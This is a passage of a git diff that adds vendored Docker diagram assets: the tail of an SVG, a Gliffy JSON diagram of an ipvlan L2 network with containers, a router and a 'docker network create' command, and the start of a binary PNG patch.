font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="69" y="42">24</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,44,296)"><g><g transform="translate(0,0) scale(1.14,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.8771929824561404,1.7543859649122808)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 103.99999999999999 0 Q 113.99999999999999 0 113.99999999999999 10 L 113.99999999999999 46.99999999999999 Q 113.99999999999999 56.99999999999999 103.99999999999999 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 103.99999999999999 0 Q 113.99999999999999 0 113.99999999999999 10 L 113.99999999999999 46.99999999999999 Q 113.99999999999999 56.99999999999999 103.99999999999999 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,34,286)"><g><g transform="translate(0,0) scale(1.14,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.8771929824561404,1.7543859649122808)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 103.99999999999999 0 Q 113.99999999999999 0 113.99999999999999 10 L 113.99999999999999 46.99999999999999 Q 113.99999999999999 56.99999999999999 103.99999999999999 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 103.99999999999999 0 Q 113.99999999999999 0 113.99999999999999 10 L 113.99999999999999 46.99999999999999 Q 113.99999999999999 56.99999999999999 103.99999999999999 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,24,276)"><g><g transform="translate(0,0) scale(1.14,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.8771929824561404,1.7543859649122808)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 103.99999999999999 0 Q 113.99999999999999 0 113.99999999999999 10 L 113.99999999999999 46.99999999999999 Q 113.99999999999999 56.99999999999999 103.99999999999999 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 103.99999999999999 0 Q 113.99999999999999 0 113.99999999999999 10 L 113.99999999999999 46.99999999999999 Q 113.99999999999999 56.99999999999999 103.99999999999999 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="matrix(1,0,0,1,34,283)"><g transform="translate(85,100) matrix(1,0,0,1,0,0) translate(-85,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="94" height="43" fill-opacity="0"/></g></g><g transform="translate(85,100) matrix(1,0,0,1,0,0) translate(-85,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="94" height="14" fill-opacity="0"/></g></g><g transform="translate(85,100) matrix(1,0,0,1,0,0) translate(-85,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="0" width="67" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="14" y="12">Container</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="66" y="12">(</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="70" y="12">s</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="76" y="12">)</text></g><g transform="translate(85,100) matrix(1,0,0,1,0,0) translate(-85,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="94" height="15" fill-opacity="0"/></g></g><g transform="translate(85,100) matrix(1,0,0,1,0,0) translate(-85,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="32" y="14" width="31" height="15" fill-opacity="0"/></g></g><g transform="translate(85,100) matrix(1,0,0,1,0,0) translate(-85,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="32" y="14" width="31" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="32" y="27">Eth0</text></g><g transform="translate(85,100) matrix(1,0,0,1,0,0) translate(-85,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="29" width="94" height="14" fill-opacity="0"/></g></g><g transform="translate(85,100) matrix(1,0,0,1,0,0) translate(-85,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="7" y="29" width="81" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="7" y="41">172</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="27" y="41">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="31" y="41">16</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="44" y="41">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="47" y="41">20</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="61" y="41">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="64" y="41">x</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="71" y="41">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="74" y="41">24</text></g></g><g transform="matrix(1,0,0,1,147,278)"><image width="170" height="60" preserveAspectRatio="none" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAKoAAAA8CAYAAAD2SSHcAAADKElEQVR4Ae3ZPWgTYRzH8SYx4gu4CG5CDAkoOAkdsiYh6GwzqEMHB1FwUREaEU7roE5KwUm6uAihc8krMUtwc3QwAREUqRIXI2he/F0xEGgSr2fvTb6B48Jzz+vn+ee5uycLC3wQQAABBBBAAAEEEEAAAQQQQAABBBBAAAEEEEAAAQQQQAABBBBAAAEEEEAAAQQQQAABBBBAAAEEEEAAAQQQQAABBBBAAAEEEAi6QCjoA/BR/wNlGfER3MyuZDKZxXg8/iKZTL5ut9tfZmbkgmWBXC53LBaLVRKJxLtOp/PeckGPMu7zqF1LzQrz5GAweKDM5y0VINNuBVLD4bChhWAzHA4XKpXKm91W4FZ+XwaqAvS4AtTQsSyIQKz6bk2YQ+2cU8CezWazL3W+W6/X2w61Y7taXwWqftlHNZKCAvSazgdsj4qCdgRCo9HoQigUWkqn08+j0ehqqVT6ZKciJ8r4IlC1gh5WcN7QAG/pOOLEQKnTskBUwXq13+8va+F4qnl53Gg0vlku7VDGsEP1Wqo2n8/v1+3mujC2VOC+DoLUkpwrmQ6plZVIJLKlgL2dSqUOutLqjEY82aIwDCPcbDYv6Zd7T/06MaNvO5KFdqpcLr81LwhvtCPDREKtVps7NsrP95ugHH/9aM6XVtp1rbD9caJbZ09XVLcGSTvBF5i76jg9PPPW3+12r+gh/pHa+uutZXJFdbpv/3v95j6qHrk+WxinuXre6fV6a61W64eF/I5k8fRlqlgs/tSo1oS2zsuUI/P7L5X2VNg3L1OeBupYUc+d3/V9Vc+Nz3Qu6GB7aozj/vmX7nBsT81z1wvQV12/qRX2iVZYQ9/Z8J8HtrfXRnpZ8u2Gvy9fprTCflDQXtYz6WnNxcbezge1TREw/0I9U61WL/rxXymzv7649U+B2076sxW1pEeCRSU8nJWPdNsCLQXoiv7jf2W7BgpOFfB0l2Jqj4KbiGVw546eI4AAAggggAACCCCAAAIIIIAAAggggAACCCCAAAIIIIAAAggggAACCCCAAAIIIIAAAggggAACCCCAAAIIIIAAAggggAACCGwL/AYbB9txUIt6ngAAAABJRU5ErkJggg==" transform="translate(0,0)"/></g><g transform="matrix(1,0,0,1,169,33)"><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="132" height="32" fill-opacity="0"/></g></g><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="132" height="16" fill-opacity="0"/></g></g><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="8" y="0" width="116" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="8" y="14">Physical</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="69" y="14">Network</text></g></g></g></svg>
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.gliffy b/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.gliffy
new file mode 100644
index 0000000000..41b0475dfa
--- /dev/null
+++ b/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.gliffy
@@ -0,0 +1 @@
+{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#ffffff","width":323,"height":292,"nodeIndex":211,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":null,"viewportType":"default","fitBB":{"min":{"x":16,"y":21.51999694824218},"max":{"x":323,"y":291.5}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":241.0,"y":36.0,"rotation":0.0,"id":199,"width":73.00000000000003,"height":40.150000000000006,"uid":"com.gliffy.shape.network.network_v4.business.router","order":41,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.network.network_v4.business.router","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#3966A0","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":85.0,"y":50.0,"rotation":0.0,"id":150,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":37,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#999999","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[3.1159999999999997,6.359996948242184],[85.55799999999999,6.359996948242184],[85.55799999999999,62.0],[84.0,62.0]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":22.803646598905374,"y":21.51999694824218,"rotation":0.0,"id":134,"width":64.31235340109463,"height":90.0,"uid":"com.gliffy.shape.cisco.cisco_v1.servers.standard_host","order":43,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.servers.standard_host","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#3d85c6","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":87.0,"y":24.199996948242188,"rotation":0.0,"id":187,"width":105.0,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":39,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:left;\"><span style=\"\">eth0 192.168.1.0/24</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":147.0,"y":50.0,"rotation":0.0,"id":196,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":40,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":199,"py":0.5,"px":0.0}}},"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#999999","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-82.00001598011289,6.075000000000003],[94.0,6.075000000000003]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":220.0,"y":79.19999694824219,"rotation":0.0,"id":207,"width":105.0,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":42,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"\">Network Router</span></p><p style=\"text-align:center;\"><span style=\"\">192.168.1.1/24</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":27.38636363636374,"y":108.14285409109937,"rotation":0.0,"id":129,"width":262.0,"height":124.0,"uid":"com.gliffy.shape.iphone.iphone_ios7.icons_glyphs.glyph_cloud","order":44,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.iphone.iphone_ios7.icons_glyphs.glyph_cloud","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#929292","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":33.0,"y":157.96785409109907,"rotation":0.0,"id":114,"width":150.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":16,"lockAspectRatio":false,"lockShape":false,"children":[{"x":44.0,"y":2.9951060358893704,"rotation":0.0,"id":95,"width":62.0,"height":36.17618270799329,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":4,"lockAspectRatio":false,"lockShape":false,"children":[{"x":29.139999999999997,"y":3.2300163132136848,"rotation":0.0,"id":96,"width":3.719999999999998,"height":29.7161500815659,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":13,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":99,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":99,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.8599999999999994,-1.2920065252854727],[1.8599999999999994,31.0081566068514]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":51.46,"y":3.2300163132136848,"rotation":0.0,"id":97,"width":1.2156862745098034,"height":31.008156606851365,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-1.4193795664340882,-1.292006525285804],[-1.4193795664340882,31.008156606851536]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.919999999999993,"y":1.5073409461663854,"rotation":0.0,"id":98,"width":1.239999999999999,"height":31.008156606851365,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":7,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[2.0393795664339223,0.4306688417619762],[2.0393795664339223,32.73083197389853]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.9380097879282103,"rotation":0.0,"id":99,"width":62.0,"height":32.300163132136866,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":2,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":38.326264274062034,"rotation":0.0,"id":112,"width":150.0,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":15,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-family:Arial;font-size:12px;\"><span style=\"\">container1</span></span></p><p style=\"text-align:center;\"><span style=\"font-family:Arial;font-size:12px;\"><span style=\"\">192.168.1.2/24</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":124.0,"y":157.96785409109907,"rotation":0.0,"id":115,"width":150.0,"height":58.99999999999999,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":33,"lockAspectRatio":false,"lockShape":false,"children":[{"x":44.0,"y":2.94518760195788,"rotation":0.0,"id":116,"width":62.0,"height":35.573246329526725,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":21,"lockAspectRatio":false,"lockShape":false,"children":[{"x":29.139999999999997,"y":3.1761827079934557,"rotation":0.0,"id":117,"width":3.719999999999998,"height":29.220880913539798,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":30,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":120,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":120,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.8600000000000136,-1.2704730831974018],[1.8600000000000136,30.49135399673719]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":51.46,"y":3.1761827079934557,"rotation":0.0,"id":118,"width":1.2156862745098034,"height":30.49135399673717,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":27,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-1.4193795664340882,-1.2704730831977067],[-1.4193795664340882,30.491353996737335]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.919999999999993,"y":1.482218597063612,"rotation":0.0,"id":119,"width":1.239999999999999,"height":30.49135399673717,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":24,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[2.0393795664339223,0.42349102773260977],[2.0393795664339223,32.185318107666895]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.9057096247960732,"rotation":0.0,"id":120,"width":62.0,"height":31.76182707993458,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":19,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":36.36247960848299,"rotation":0.0,"id":121,"width":150.0,"height":30.183360522022674,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":32,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-family:Arial;font-size:12px;\"><span style=\"\">container2</span></span></p><p style=\"text-align:center;\"><span style=\"\">192.168.1.3/24</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":102.0,"y":130.1999969482422,"rotation":0.0,"id":130,"width":150.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":34,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"\">pub_net (eth0)</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":93.0,"y":92.69999694824219,"rotation":0.0,"id":140,"width":150.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":35,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"text-decoration:none;font-family:Arial;font-size:12px;\"><span style=\"text-decoration:none;\"><br /></span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":14.0,"y":114.19999694824219,"rotation":0.0,"id":142,"width":78.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":36,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-family:Arial;font-size:12px;\"><span style=\"\">Docker Host</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":71.0,"y":235.5,"rotation":0.0,"id":184,"width":196.0,"height":56.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":38,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:left;\"><span style=\"\">docker network create -d ipvlan \\</span></p><p style=\"text-align:left;\"><span style=\"\">&nbsp; &nbsp; --subnet&#61;192.168.1.0/24 \\</span></p><p style=\"text-align:left;\"><span style=\"\">&nbsp; &nbsp; --gateway&#61;192.168.1.1 \\</span></p><p style=\"text-align:left;\"><span style=\"\">&nbsp; &nbsp; -o parent&#61;eth0 pub_net</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"layers":[{"guid":"9wom3rMkTrb3","order":0,"name":"Layer 0","active":true,"locked":false,"visible":true,"nodeIndex":45}],"shapeStyles":{},"lineStyles":{"global":{"stroke":"#999999","strokeWidth":6,"orthoMode":1}},"textStyles":{"global":{"bold":true,"face":"Arial","size":"12px","color":"#000000"}}},"metadata":{"title":"untitled","revision":0,"exportBorder":false,"loadPosition":"default","libraries":["com.gliffy.libraries.network.network_v4.home","com.gliffy.libraries.network.network_v4.business","com.gliffy.libraries.network.network_v4.rack","com.gliffy.libraries.network.network_v3.home","com.gliffy.libraries.network.network_v3.business","com.gliffy.libraries.network.network_v3.rack"],"lastSerialized":1457584497063,"analyticsProduct":"Confluence"},"embeddedResources":{"index":0,"resources":[]}}
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.png b/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.png
new file mode 100644
index 0000000000000000000000000000000000000000..e489a446ddd255ce9360445f0f895acad31ae214
GIT binary patch
literal 20145
zcmcF}Wm_BX)-MEt1b26e7k77e*Wy;ZSn&jRC|X>LyHhN<TY(mBad$6z`0wXDd++lB
z&I_(9Ozv50-9MX2GEwTPa%do85DW|qnu5HvCJYR$-rFA^65#E~m(o-`7#P*h3epnV
zpO=qwV)StI$cL{mb}$xCS|;uNS|05hZB0+S_|_V0OLSX#TNZdvZc|%+3f%IDW>z@S
ze8i0cV6p4QB~YT4VUhO25)Fd;Y4*<v%@Sc7{)~q5!>1#ZpvVXQxpL@g=es)ECJoB_
zyXF_<{ZZ+Qd~qMX23VTO0}Ci$EJ^VH|K+bA>SiF`)Q`u6!a+qr=091`>~XaCToMYq
z%#PZ)GO53SJ}8O9N}r9aMcoYQQM|NynYTCxUG1+$oqx-f<NJi-b$L@ha6h1}*YmbG
z5)i`(pSvh@IqY-+lsiM*`L#}~z7};G?6hZ32J4cB^vgF~ixykMY?fPq$8%eA+A`}9
zpS0`v;x=lue46@KHRbwBBiR;C@=*-1DGEUQgIWWoAjbAAVuP1?wxjkIzwj=nzgjn&
zGODdorQ2(rX;~T;+x`m!`2LKX@bPGB2pCbbg;R6*>Fj)QU^!q?7qhN(_vcsMC~IKT
